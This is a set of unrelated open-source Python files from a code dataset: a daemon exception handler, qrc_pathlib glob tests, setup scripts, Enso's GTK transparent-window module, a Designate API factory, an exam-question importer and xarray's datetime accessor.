err = 'uhm, I did not understand.'
try:
response = self.anymethod()
except RuntimeError as e:
logger.exception(e)
response = {'text': err}
except OSError as e:
logger.exception(e)
response = {'text': err}
except TypeError as e:
logger.exception(e)
response = {'text': err}
except KeyError as e:
logger.exception(e)
response = {'text': err}
except SyntaxError as e:
logger.exception(e)
response = {'text': err}
except NameError as e:
logger.exception(e)
response = {'text': err}
except AttributeError as e:
logger.exception(e)
response = {'text': err}
except UnicodeEncodeError as e:
logger.exception(e)
response = {'text': err}
except ImportError as e:
logger.exception(e)
response = {'text': err}
except Exception as e:
logger.exception(e)
response = {'text': err}
return response
def anymethod(self):
"""docstring for run"""
return 'anymethod method called'
try:
d = Daemon()
d.start()
except KeyboardInterrupt:
logger.info('Terminate process %s')
exit()
| mit | -6,112,931,179,038,487,000 | 29.811111 | 66 | 0.498017 | false |
GreatFruitOmsk/qrc_pathlib | test/qrc_glob.py | 1 | 1104 | import unittest
from qrc_pathlib import qrc_glob
from test import fixture
class TestQrcGlob(unittest.TestCase):
def test_iglob_with_files(self):
self.assertEqual(set(qrc_glob.iglob(':привет.txt')), {':/привет.txt'})
self.assertEqual(set(qrc_glob.iglob(':привет.txt/')), set())
def test_iglob_with_dirs(self):
self.assertEqual(set(qrc_glob.iglob(':dir')), {':/dir'})
self.assertEqual(set(qrc_glob.iglob(':dir/')), {':/dir'})
def test_iglob_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':*.txt')), {':/привет.txt', ':/42.txt'})
self.assertEqual(set(qrc_glob.iglob(':[0-9][0-9].txt')), {':/42.txt'})
def test_iglob_dir_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':/dir/*.txt')), {':/dir/1.txt', ':/dir/2.txt'})
def test_iglob_recursive_pattern(self):
self.assertEqual(set(qrc_glob.iglob(':/**/*.txt')), {':/dir/1.txt', ':/dir/2.txt'})
self.assertEqual(set(qrc_glob.iglob(':/**/*.txt', recursive=True)), {':/dir/1.txt', ':/dir/2.txt', ':/привет.txt', ':/42.txt'})
| mit | -6,275,855,797,841,274,000 | 40.307692 | 135 | 0.60149 | false |
marcelometal/python-semanticversion | setup.py | 1 | 2387 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2014 The python-semanticversion project
import codecs
import os
import re
import sys
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
def get_version(package_name):
version_re = re.compile(r"^__version__ = [\"']([\w_.-]+)[\"']$")
package_components = package_name.split('.')
init_path = os.path.join(root_dir, *(package_components + ['__init__.py']))
with codecs.open(init_path, 'r', 'utf-8') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
def clean_readme(fname):
"""Cleanup README.rst for proper PyPI formatting."""
with codecs.open(fname, 'r', 'utf-8') as f:
return ''.join(
re.sub(r':\w+:`([^`]+?)( <[^<>]+>)?`', r'``\1``', line)
for line in f
if not (line.startswith('.. currentmodule') or line.startswith('.. toctree'))
)
PACKAGE = 'semantic_version'
setup(
name=PACKAGE,
version=get_version(PACKAGE),
author="Raphaël Barrois",
author_email="[email protected]",
description="A library implementing the 'SemVer' scheme.",
long_description=clean_readme('README.rst'),
license='BSD',
keywords=['semantic version', 'versioning', 'version'],
url='https://github.com/rbarrois/python-semanticversion',
download_url='http://pypi.python.org/pypi/semantic_version/',
packages=['semantic_version'],
setup_requires=[
'setuptools>=0.8',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries :: Python Modules'
],
test_suite='tests',
)
| bsd-2-clause | 6,003,106,888,543,752,000 | 31.684932 | 89 | 0.595977 | false |
tartakynov/enso | enso/platform/linux/graphics.py | 1 | 13206 | """
Author : Guillaume "iXce" Seguin
Email : [email protected]
Copyright (C) 2008, Guillaume Seguin <[email protected]>.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of Enso nor the names of its contributors may
be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import logging
from time import sleep
import gtk
import cairo
from enso.events import EventManager
# Max opacity as used in Enso core (opacities will be converted to fit in
# [0;1] in this backend)
MAX_OPACITY = 0xff
# Enable Fake transparency when no the screen isn't composited?
FAKE_TRANSPARENCY = False
class TransparentWindow (object):
'''TransparentWindow object, using a gtk.Window'''
__instance = None
class _impl (gtk.Window):
'''Actual implementation of the TransparentWindow ; this mechanism is
due to the way Enso handles TransparentWindows deletion, which requires the
main TransparentWindow object to not be referenced by other modules, which
gtk would do, for instance.'''
__gsignals__ = {
"expose-event" : "override",
"screen-changed" : "override",
}
__wallpaper_surface = None
__wallpaper_screen = None
def __init__ (self, x, y, maxWidth, maxHeight):
'''Initialize object'''
gtk.Window.__init__ (self, gtk.WINDOW_POPUP)
self.__x = x
self.__y = y
self.__maxWidth = maxWidth
self.__maxHeight = maxHeight
self.__width = maxWidth
self.__height = maxHeight
self.__surface = None
self.__opacity = 0xff
self.__screen_composited = False
self.__eventMgr = EventManager.get ()
self.set_app_paintable (True)
self.do_screen_changed ()
self.connect ("motion-notify-event", self.on_motion_notify_event)
self.connect ("delete-event", self.ensure_pointer_ungrabbed)
self.move (self.__x, self.__y)
self.set_default_size (self.__width, self.__height)
def grab_pointer (self, *args):
'''Grab pointer to be able to catch all motion events'''
if not gtk.gdk.pointer_is_grabbed ():
mask = gtk.gdk.POINTER_MOTION_MASK
while gtk.gdk.pointer_grab (self.window, True, mask) \
!= gtk.gdk.GRAB_SUCCESS:
sleep (0.1)
def ensure_pointer_ungrabbed (self, *args):
'''Make sure the pointer is ungrabbed to avoid bad deadlocks'''
if gtk.gdk.pointer_is_grabbed ():
gtk.gdk.pointer_ungrab ()
def on_motion_notify_event (self, window, event):
'''Forward mouse motion events to Enso core'''
self.__eventMgr.onMouseMove (event.x, event.y)
def do_expose_event (self, event):
'''Handle expose events'''
if event.window == self.window:
cr = self.window.cairo_create ()
self.draw_surface (cr)
def draw_surface (self, cr):
'''Draw surface to the window Cairo context'''
cr.rectangle (0, 0, self.__width, self.__height)
cr.clip ()
cr.set_operator (cairo.OPERATOR_CLEAR)
cr.paint ()
if self.__surface:
cr.set_operator (cairo.OPERATOR_OVER)
cr.set_source_surface (self.__surface)
if not self.__screen_composited and not FAKE_TRANSPARENCY:
cr.paint ()
else:
cr.paint_with_alpha (float (self.__opacity) / MAX_OPACITY)
if not self.__screen_composited and FAKE_TRANSPARENCY:
self.draw_wallpaper (cr)
def draw_wallpaper (self, cr):
'''Draw wallpaper below surface contents to fake transparency'''
if not TransparentWindow._impl.__wallpaper_surface:
update_wallpaper_surface ()
if not TransparentWindow._impl.__wallpaper_surface:
return
cr.set_operator (cairo.OPERATOR_DEST_ATOP)
cr.set_source_surface (TransparentWindow._impl.__wallpaper_surface)
cr.mask_surface (self.__surface)
def __update_wallpaper_surface (self):
'''Internal function that fetches the root window pixmap to use
as background when doing fake transparency'''
screen = self.get_screen ()
if TransparentWindow._impl.__wallpaper_screen == screen:
return
TransparentWindow._impl.__wallpaper_screen = screen
root = screen.get_root_window ()
id = root.property_get ("_XROOTPMAP_ID", "PIXMAP")[2][0]
if hasattr (gtk.gdk, "gdk_pixmap_foreign_new"):
pixmap = gtk.gdk.gdk_pixmap_foreign_new (long (id))
else:
pixmap = gtk.gdk.pixmap_foreign_new (long (id))
width, height = screen.get_width (), screen.get_height ()
if (width, height) != pixmap.get_size():
return
pixmap.set_colormap (screen.get_rgb_colormap ())
wallpaper_surface = cairo.ImageSurface (cairo.FORMAT_ARGB32,
width, height)
cr2 = cairo.Context (wallpaper_surface)
gdkcr = gtk.gdk.CairoContext (cr2)
gdkcr.set_source_pixmap (pixmap, 0, 0)
gdkcr.paint ()
TransparentWindow._impl.__wallpaper_surface = wallpaper_surface
def do_screen_changed (self, old_screen = None):
'''Update colormap/background and so on when screen changes'''
screen = self.get_screen ()
colormap = None
if hasattr (screen, "get_rgba_colormap"):
colormap = screen.get_rgba_colormap ()
if not colormap:
logging.warn ('''No RGBA colormap available, \
falling back to RGB''')
colormap = screen.get_rgb_colormap ()
self.set_colormap (colormap)
self.__screen_composited = False
if hasattr (screen, "is_composited"):
self.__screen_composited = screen.is_composited ()
if not self.__screen_composited and FAKE_TRANSPARENCY:
logging.warn ('''Switching to fake transparency mode, \
please use a compositing manager to get proper blending.''')
self.__update_wallpaper_surface ()
def update_shape (self):
'''Update the window shape'''
pixmap = gtk.gdk.Pixmap (None, self.__width, self.__height, 1)
cr = pixmap.cairo_create ()
cr.rectangle (0, 0, self.__width, self.__height)
cr.clip ()
self.draw_surface (cr)
if hasattr (self, "input_shape_combine_mask"):
self.input_shape_combine_mask (None, 0, 0)
self.input_shape_combine_mask (pixmap, 0, 0)
if not self.__screen_composited:
self.shape_combine_mask (pixmap, 0, 0)
def update (self):
'''Queue drawing when Enso core requests it'''
if self.__surface:
self.update_shape ()
self.queue_draw ()
def makeCairoSurface (self):
'''Prepare a Cairo Surface large enough for this window'''
if not self.__surface:
self.__surface = cairo.ImageSurface (cairo.FORMAT_ARGB32,
self.__maxWidth,
self.__maxHeight)
self.update_shape ()
self.show ()
return self.__surface
def setOpacity (self, opacity):
'''Set window opacity and grab or ungrab the pointer according to
the opacity level ; this is probably a FIXME cause it looks really ugly and
might cause bad conflicts or race conditions in the future.'''
self.__opacity = opacity
# FIXME: I'm not clean
if self.__opacity == MAX_OPACITY:
self.grab_pointer ()
else:
self.ensure_pointer_ungrabbed ()
self.update ()
def getOpacity (self):
'''Get window opacity'''
return self.__opacity
def setPosition( self, x, y ):
'''Set window position'''
self.__x = x
self.__y = y
self.move (self.__x, self.__y)
def getX (self):
'''Get window x coordinate'''
return self.__x
def getY (self):
'''Get window y coordinate'''
return self.__y
def setSize (self, width, height):
'''Resize window and update input shape'''
self.__width = width
self.__height = height
self.resize (self.__width, self.__height)
self.update_shape ()
def getWidth (self):
'''Get window width'''
return self.__width
def getHeight (self):
'''Get window height'''
return self.__height
def getMaxWidth (self):
'''Get window maximum width'''
return self.__maxWidth
def getMaxHeight (self):
'''Get window maximum height'''
return self.__maxHeight
def finish (self):
'''Finish this window: delete the Cairo surface, ungrab pointer
and destroy it.'''
if self.__surface:
self.__surface.finish ()
self.__surface = None
self.ensure_pointer_ungrabbed ()
self.destroy ()
def __init__ (self, x, y, maxWidth, maxHeight):
'''Initialize object'''
instance = TransparentWindow._impl (x, y, maxWidth, maxHeight)
self.__dict__['_TransparentWindow__instance'] = instance
def __getattr__ (self, attr):
'''Delegate to inner implementation'''
return getattr (self.__instance, attr)
def __setattr__ (self, attr, value):
'''Delegate to inner implementation'''
return setattr (self.__instance, attr, value)
def __del__ (self):
'''Destroy the inner instance'''
self.finish ()
def getCurrentMonitor ():
'''Helper fetching the current monitor of focus'''
from enso.platform.linux import utils
display = utils.get_display ()
input_focus = display.get_input_focus ()
if input_focus != None and input_focus.focus:
window = input_focus.focus
geom = window.get_geometry()
width = geom.width
if (width == display.screen().width_in_pixels):
'''Either a full screen window or desktop.
We will use mouse coordinates for this'''
_, x, y, _ = gtk.gdk.display_get_default().get_pointer()
else:
'''A floating window. We will see which monitor
the majority of the window is on'''
root = window.query_tree().root
trans = root.translate_coords(window, 0, 0)
x = trans.x + (width / 2)
y = trans.y
else:
x, y = 0, 0
print "no focus"
return gtk.gdk.screen_get_default ().get_monitor_at_point(x, y)
def getDesktopOffset ():
'''Helper fetching the offset so that Enso can draw on multiple desktops'''
left, top, _, _ = gtk.gdk.screen_get_default ().get_monitor_geometry (getCurrentMonitor ())
return left, top
def getDesktopSize ():
_, _, width, height = gtk.gdk.screen_get_default ().get_monitor_geometry (getCurrentMonitor ())
return width, height
| bsd-3-clause | 1,813,447,158,428,719,600 | 39.012422 | 99 | 0.564213 | false |
melodous/designate | designate/api/v2/__init__.py | 1 | 1664 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan.deploy
from oslo.config import cfg
from designate.api.v2 import patches # flake8: noqa
from designate.openstack.common import log as logging
LOG = logging.getLogger(__name__)
OPTS = [
cfg.ListOpt('enabled-extensions-v2', default=[],
help='Enabled API Extensions'),
]
cfg.CONF.register_opts(OPTS, group='service:api')
def factory(global_config, **local_conf):
if not cfg.CONF['service:api'].enable_api_v2:
def disabled_app(environ, start_response):
status = '404 Not Found'
start_response(status, [])
return []
return disabled_app
conf = {
'app': {
'root': 'designate.api.v2.controllers.root.RootController',
'modules': ['designate.api.v2'],
'errors': {
404: '/errors/not_found',
405: '/errors/method_not_allowed',
'__force_dict__' : True
}
}
}
app = pecan.deploy.deploy(conf)
return app
| apache-2.0 | -2,081,888,719,544,165,000 | 29.254545 | 75 | 0.643029 | false |
RazerM/ratelimiter | setup.py | 1 | 1597 | # Original work Copyright 2013 Arnaud Porterie
# Modified work Copyright 2015 Frazer McLean
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from setuptools import setup
FILE = 'ratelimiter/__init__.py'
init_data = open(FILE).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", init_data))
AUTHOR_EMAIL = metadata['author']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
AUTHOR, EMAIL = re.match(r'(.*) <(.*)>', AUTHOR_EMAIL).groups()
extras_require = dict()
extras_require['test'] = {
'pytest>=3.0',
}
extras_require['test:python_version>="3.5"'] = {'pytest-asyncio'}
setup(
name='ratelimiter',
version=VERSION,
description=DESCRIPTION,
long_description=open('README.rst').read(),
author=AUTHOR,
author_email=EMAIL,
url='https://github.com/RazerM/ratelimiter',
packages=['ratelimiter'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
],
license=LICENSE,
extras_require=extras_require)
| apache-2.0 | -4,260,098,636,080,958,000 | 29.132075 | 74 | 0.696306 | false |
WalterSchaertl/NYRP | question_maker.py | 1 | 5644 | # Takes a .txt semi-edited version of an exam and creates questions from it
# Inputs:
# A .txt version of the exam (requires some pre-possessing)
# A .txt version of the answers (question # question answer, 1 per line)
# A path of the folder of images that go with the question, named as subject_year_month_question#.JPG
# The subject (must be an option from NYRegentsPrep/settings.py SUBJECTS)
# The exams year
# The exams month
# TODO: use https://apiv2.online-convert.com/ to auto convert, take in pdf as input
# TODO: preprocess to strip whitespace ext
# TODO: break up into multiple stages?
import sys
import re
import os
from shutil import copy
os.environ["DJANGO_SETTINGS_MODULE"] = "NYRegentsPrep.settings"
import django
django.setup()
from NYRP.models import Question
def main():
if len(sys.argv) != 7:
print("Requires five parameters: the questions text file, the answers text file, the subject, the Year of the"
" exam, the month of the exam.")
print("ex) python3 question_maker.py questions.txt answers.txt . CHEM 2020 August")
return
ans_map = {1: "A", 2: "B", 3: "C", 4: "D", 5: "E"}
answers = dict()
questions = dict()
questions_file = sys.argv[1]
answers_file = sys.argv[2]
picture_dir = sys.argv[3]
subject = sys.argv[4]
year = sys.argv[5]
month = sys.argv[6]
# Read in the correct answers
with open(answers_file) as f:
for line in f.readlines():
q, a = line.split()
answers[int(q)] = int(a)
# Part 1: Read in and parse the exam
with open(questions_file) as f:
lines = f.readlines()
for i in range(len(lines)):
# Search for the start of a question
match = re.compile(r"^\d* ").match(lines[i])
if match is not None and int(match.group(0)) <= 50:
# Start of a question and answers (trim its number) and don't end until the next question
# is found or the end of the file
question_block = lines[i][len(match.group(0)):]
i += 1
while i < len(lines) and re.compile(r"^\d{1,2} ").match(lines[i]) is None:
question_block += lines[i]
i += 1
i -= 1
# Parse through the text of answers looking for (1), (2), (3), and (4)
# These are not guaranteed to be in any particular order
opts = {1: "", 2: "", 3: "", 4: ""}
indexes = sorted([question_block.index("(" + str(i) + ")") for i in range(1, 5)])
question = question_block[:indexes[0]].replace("\n", " ").strip()
for j in range(4):
answer_num = int(question_block[int(indexes[j] + 1)])
start = indexes[j]
end = indexes[j + 1] if j + 1 < 4 else -1
opts[answer_num] = question_block[start:end].replace("\n", " ").strip()[4:]
questions[int(match.group(0))] = {
"question": question, "A": opts[1], "B": opts[2], "C": opts[3], "D": opts[4], "E": "",
}
# print(match.group(0) + ": " + question)
# print("\t A: '" + answers[1] + "'")
# print("\t B: '" + answers[2] + "'")
# print("\t C: '" + answers[3] + "'")
# print("\t D: '" + answers[4] + "'\n")
# Part 2: All questions created, go through and assign topics for each and write to file
start = int(input("Start at question: "))
temp_file = sys.argv[1][:sys.argv[1].index(".txt")] + "_formatted_questions.txt"
with open(temp_file, "a") as outf:
for question_num in sorted(questions.keys()):
if question_num < start:
continue
v = questions[question_num]
diagram = ""
diagram_name = subject + "_" + year + "_" + month + "_" + str(question_num) + ".JPG"
if os.path.isfile(os.path.join(picture_dir, diagram_name)):
src = os.path.join(picture_dir, diagram_name)
diagram = os.path.join("diagrams", diagram_name)
copy(src, os.path.join("NYRP", "static", "diagrams/", diagram_name))
print(str(question_num) + ": " + v["question"])
print("\tA: '" + v["A"] + "'")
print("\tB: '" + v["B"] + "'")
print("\tC: '" + v["C"] + "'")
print("\tD: '" + v["D"] + "'")
print("\tE: '" + v["E"] + "'")
print("\tAnswer: " + ans_map[answers[question_num]])
print("\tDiagram: " + diagram)
unit = input("Unit: ")
outf.write(v["question"] + "\n")
outf.write(v["A"] + "\n")
outf.write(v["B"] + "\n")
outf.write(v["C"] + "\n")
outf.write(v["D"] + "\n")
outf.write(v["E"] + "\n")
outf.write(ans_map[answers[question_num]] + "\n")
outf.write(subject + "\n")
outf.write(month + "\n")
outf.write(year + "\n")
outf.write(unit + "\n")
outf.write(diagram + "\n")
if input("Stop? ") in ["Y", "y", "yes", "Yes", "YES"]:
break
print("Intermediate results stored in " + temp_file)
print("Check and edit that file and then save it.")
if input("Continue? [Y/N] ") not in ["Y", "y", "yes", "Yes", "YES"]:
return
# Part 3: Manual edits to the file if required
# Part 4: Read the file and create the db question objects
i = 0
with open(temp_file, "r") as inf:
while i < 50:
i += 1
try:
q = inf.readline().strip()
a = inf.readline().strip()
b = inf.readline().strip()
c = inf.readline().strip()
d = inf.readline().strip()
e = inf.readline().strip()
ans = inf.readline().strip()
subject = inf.readline().strip()
month = inf.readline().strip()
year = int(inf.readline())
unit = int(inf.readline())
diagram = inf.readline().strip()
question = Question.objects.create(question=q, A=a, B=b, C=c, D=d, E=e, ans=ans, subject=subject, month=month,
year=year, unit=unit, group=None, hint=None, diagram=diagram)
try:
question.save()
except Exception as e:
print("Could not save question! " + str(e))
print("question saved: " + str(question))
except IOError:
pass
print("All questions ingested")
if __name__ == "__main__":
main()
| mit | -3,043,786,063,696,455,000 | 34.055901 | 114 | 0.606485 | false |
xray/xray | xarray/core/accessor_dt.py | 1 | 16105 | import numpy as np
import pandas as pd
from .common import (
_contains_datetime_like_objects,
is_np_datetime_like,
is_np_timedelta_like,
)
from .pycompat import dask_array_type
def _season_from_months(months):
"""Compute season (DJF, MAM, JJA, SON) from month ordinal"""
# TODO: Move "season" accessor upstream into pandas
seasons = np.array(["DJF", "MAM", "JJA", "SON"])
months = np.asarray(months)
return seasons[(months // 3) % 4]
def _access_through_cftimeindex(values, name):
"""Coerce an array of datetime-like values to a CFTimeIndex
and access requested datetime component
"""
from ..coding.cftimeindex import CFTimeIndex
values_as_cftimeindex = CFTimeIndex(values.ravel())
if name == "season":
months = values_as_cftimeindex.month
field_values = _season_from_months(months)
else:
field_values = getattr(values_as_cftimeindex, name)
return field_values.reshape(values.shape)
def _access_through_series(values, name):
"""Coerce an array of datetime-like values to a pandas Series and
access requested datetime component
"""
values_as_series = pd.Series(values.ravel())
if name == "season":
months = values_as_series.dt.month.values
field_values = _season_from_months(months)
else:
field_values = getattr(values_as_series.dt, name).values
return field_values.reshape(values.shape)
def _get_date_field(values, name, dtype):
"""Indirectly access pandas' libts.get_date_field by wrapping data
as a Series and calling through `.dt` attribute.
Parameters
----------
values : np.ndarray or dask.array-like
Array-like container of datetime-like values
name : str
Name of datetime field to access
dtype : dtype-like
dtype for output date field values
Returns
-------
datetime_fields : same type as values
Array-like of datetime fields accessed for each element in values
"""
if is_np_datetime_like(values.dtype):
access_method = _access_through_series
else:
access_method = _access_through_cftimeindex
if isinstance(values, dask_array_type):
from dask.array import map_blocks
return map_blocks(access_method, values, name, dtype=dtype)
else:
return access_method(values, name)
def _round_through_series_or_index(values, name, freq):
"""Coerce an array of datetime-like values to a pandas Series or xarray
CFTimeIndex and apply requested rounding
"""
from ..coding.cftimeindex import CFTimeIndex
if is_np_datetime_like(values.dtype):
values_as_series = pd.Series(values.ravel())
method = getattr(values_as_series.dt, name)
else:
values_as_cftimeindex = CFTimeIndex(values.ravel())
method = getattr(values_as_cftimeindex, name)
field_values = method(freq=freq).values
return field_values.reshape(values.shape)
def _round_field(values, name, freq):
"""Indirectly access rounding functions by wrapping data
as a Series or CFTimeIndex
Parameters
----------
values : np.ndarray or dask.array-like
Array-like container of datetime-like values
name : {"ceil", "floor", "round"}
Name of rounding function
freq : str
a freq string indicating the rounding resolution
Returns
-------
rounded timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
if isinstance(values, dask_array_type):
from dask.array import map_blocks
dtype = np.datetime64 if is_np_datetime_like(values.dtype) else np.dtype("O")
return map_blocks(
_round_through_series_or_index, values, name, freq=freq, dtype=dtype
)
else:
return _round_through_series_or_index(values, name, freq)
def _strftime_through_cftimeindex(values, date_format):
"""Coerce an array of cftime-like values to a CFTimeIndex
and access requested datetime component
"""
from ..coding.cftimeindex import CFTimeIndex
values_as_cftimeindex = CFTimeIndex(values.ravel())
field_values = values_as_cftimeindex.strftime(date_format)
return field_values.values.reshape(values.shape)
def _strftime_through_series(values, date_format):
"""Coerce an array of datetime-like values to a pandas Series and
apply string formatting
"""
values_as_series = pd.Series(values.ravel())
strs = values_as_series.dt.strftime(date_format)
return strs.values.reshape(values.shape)
def _strftime(values, date_format):
if is_np_datetime_like(values.dtype):
access_method = _strftime_through_series
else:
access_method = _strftime_through_cftimeindex
if isinstance(values, dask_array_type):
from dask.array import map_blocks
return map_blocks(access_method, values, date_format)
else:
return access_method(values, date_format)
class Properties:
def __init__(self, obj):
self._obj = obj
def _tslib_field_accessor( # type: ignore
name: str, docstring: str = None, dtype: np.dtype = None
):
def f(self, dtype=dtype):
if dtype is None:
dtype = self._obj.dtype
obj_type = type(self._obj)
result = _get_date_field(self._obj.data, name, dtype)
return obj_type(
result, name=name, coords=self._obj.coords, dims=self._obj.dims
)
f.__name__ = name
f.__doc__ = docstring
return property(f)
def _tslib_round_accessor(self, name, freq):
obj_type = type(self._obj)
result = _round_field(self._obj.data, name, freq)
return obj_type(result, name=name, coords=self._obj.coords, dims=self._obj.dims)
def floor(self, freq):
"""
Round timestamps downward to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
floor-ed timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("floor", freq)
def ceil(self, freq):
"""
Round timestamps upward to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
ceil-ed timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("ceil", freq)
def round(self, freq):
"""
Round timestamps to specified frequency resolution.
Parameters
----------
freq : str
a freq string indicating the rounding resolution e.g. "D" for daily resolution
Returns
-------
rounded timestamps : same type as values
Array-like of datetime fields accessed for each element in values
"""
return self._tslib_round_accessor("round", freq)
class DatetimeAccessor(Properties):
"""Access datetime fields for DataArrays with datetime-like dtypes.
Fields can be accessed through the `.dt` attribute
for applicable DataArrays.
Examples
---------
>>> import xarray as xr
>>> import pandas as pd
>>> dates = pd.date_range(start="2000/01/01", freq="D", periods=10)
>>> ts = xr.DataArray(dates, dims=("time"))
>>> ts
<xarray.DataArray (time: 10)>
array(['2000-01-01T00:00:00.000000000', '2000-01-02T00:00:00.000000000',
'2000-01-03T00:00:00.000000000', '2000-01-04T00:00:00.000000000',
'2000-01-05T00:00:00.000000000', '2000-01-06T00:00:00.000000000',
'2000-01-07T00:00:00.000000000', '2000-01-08T00:00:00.000000000',
'2000-01-09T00:00:00.000000000', '2000-01-10T00:00:00.000000000'],
dtype='datetime64[ns]')
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
>>> ts.dt
<xarray.core.accessor_dt.DatetimeAccessor object at 0x118b54d68>
>>> ts.dt.dayofyear
<xarray.DataArray 'dayofyear' (time: 10)>
array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
>>> ts.dt.quarter
<xarray.DataArray 'quarter' (time: 10)>
array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 ... 2000-01-10
"""
def strftime(self, date_format):
'''
Return an array of formatted strings specified by date_format, which
supports the same string format as the python standard library. Details
of the string format can be found in `python string format doc
<https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior>`__
Parameters
----------
date_format : str
date format string (e.g. "%Y-%m-%d")
Returns
-------
formatted strings : same type as values
Array-like of strings formatted for each element in values
Examples
--------
>>> rng = xr.Dataset({"time": datetime.datetime(2000, 1, 1)})
>>> rng["time"].dt.strftime("%B %d, %Y, %r")
<xarray.DataArray 'strftime' ()>
array('January 01, 2000, 12:00:00 AM', dtype=object)
"""
'''
obj_type = type(self._obj)
result = _strftime(self._obj.data, date_format)
return obj_type(
result, name="strftime", coords=self._obj.coords, dims=self._obj.dims
)
year = Properties._tslib_field_accessor(
"year", "The year of the datetime", np.int64
)
month = Properties._tslib_field_accessor(
"month", "The month as January=1, December=12", np.int64
)
day = Properties._tslib_field_accessor("day", "The days of the datetime", np.int64)
hour = Properties._tslib_field_accessor(
"hour", "The hours of the datetime", np.int64
)
minute = Properties._tslib_field_accessor(
"minute", "The minutes of the datetime", np.int64
)
second = Properties._tslib_field_accessor(
"second", "The seconds of the datetime", np.int64
)
microsecond = Properties._tslib_field_accessor(
"microsecond", "The microseconds of the datetime", np.int64
)
nanosecond = Properties._tslib_field_accessor(
"nanosecond", "The nanoseconds of the datetime", np.int64
)
weekofyear = Properties._tslib_field_accessor(
"weekofyear", "The week ordinal of the year", np.int64
)
week = weekofyear
dayofweek = Properties._tslib_field_accessor(
"dayofweek", "The day of the week with Monday=0, Sunday=6", np.int64
)
weekday = dayofweek
weekday_name = Properties._tslib_field_accessor(
"weekday_name", "The name of day in a week", object
)
dayofyear = Properties._tslib_field_accessor(
"dayofyear", "The ordinal day of the year", np.int64
)
quarter = Properties._tslib_field_accessor("quarter", "The quarter of the date")
days_in_month = Properties._tslib_field_accessor(
"days_in_month", "The number of days in the month", np.int64
)
daysinmonth = days_in_month
season = Properties._tslib_field_accessor("season", "Season of the year", object)
time = Properties._tslib_field_accessor(
"time", "Timestamps corresponding to datetimes", object
)
is_month_start = Properties._tslib_field_accessor(
"is_month_start",
"Indicates whether the date is the first day of the month.",
bool,
)
is_month_end = Properties._tslib_field_accessor(
"is_month_end", "Indicates whether the date is the last day of the month.", bool
)
is_quarter_start = Properties._tslib_field_accessor(
"is_quarter_start",
"Indicator for whether the date is the first day of a quarter.",
bool,
)
is_quarter_end = Properties._tslib_field_accessor(
"is_quarter_end",
"Indicator for whether the date is the last day of a quarter.",
bool,
)
is_year_start = Properties._tslib_field_accessor(
"is_year_start", "Indicate whether the date is the first day of a year.", bool
)
